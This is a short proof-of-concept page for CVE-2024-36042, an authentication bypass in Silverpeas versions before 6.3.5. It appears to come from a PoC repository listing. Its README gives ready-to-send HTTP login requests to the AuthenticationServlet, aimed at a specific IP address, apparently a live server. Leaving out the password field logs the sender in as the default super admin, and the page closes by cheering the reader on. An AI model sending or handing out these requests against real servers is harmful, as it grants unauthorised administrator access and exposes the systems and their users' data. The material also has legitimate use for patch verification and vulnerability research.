CVE-2024-36042 PoC — Silverpeas 安全漏洞

Source

Associated Vulnerability

Description

CVE-2024-36042 Silverpeas authentication bypass vulnerability #Silverpeas #vulnerability #authentication 

Readme

# CVE-2024-36042
CVE-2024-36042 Silverpeas authentication bypass vulnerability #Silverpeas #vulnerability #authentication 

## Firstly we must identify is that vulnerable version.
All versions prior to 6.3.5 are vulnerable (i.e., version 6.3.4 and earlier). if the sender omits the password form field, the application will sign you in as the user specified without any challenge.

## The standard login request will look like this in Burp Suite:
```
POST /silverpeas/AuthenticationServlet HTTP/2
Host: 212.129.58.88
Content-Length: 28
Origin: https://212.129.58.88
Content-Type: application/x-www-form-urlencoded

Login=SilverAdmin&Password=SilverAdmin&DomainId=0
```

This will fail login (unless they have forgotten to change the default password) and you will be redirected back to the login page with an error code.

## But if you remove the password field like this:
```
POST /silverpeas/AuthenticationServlet HTTP/2
Host: 212.129.58.88
Content-Length: 28
Origin: https://212.129.58.88
Content-Type: application/x-www-form-urlencoded

Login=SilverAdmin&DomainId=0
```

Then the login attempt will (usually) succeed and redirect you to the main page, now logged in as a super admin.

![Alt text](https://github.com/zaaraZiof0/CVE-2024-36042/blob/main/evidance.png)

The bug works with any valid user, but SilverAdmin is the default super admin.

Engoy !

File Snapshot

 [4.0K]  /data/pocs/0d7cd40be279f5756ddc7ead2e1e871a8814afd4
├── [ 82K]  evidance.png
├── [1.3K]  README.md
└── [ 82K]  Screenshot 2025-08-20 003647.png

0 directories, 3 files

Remarks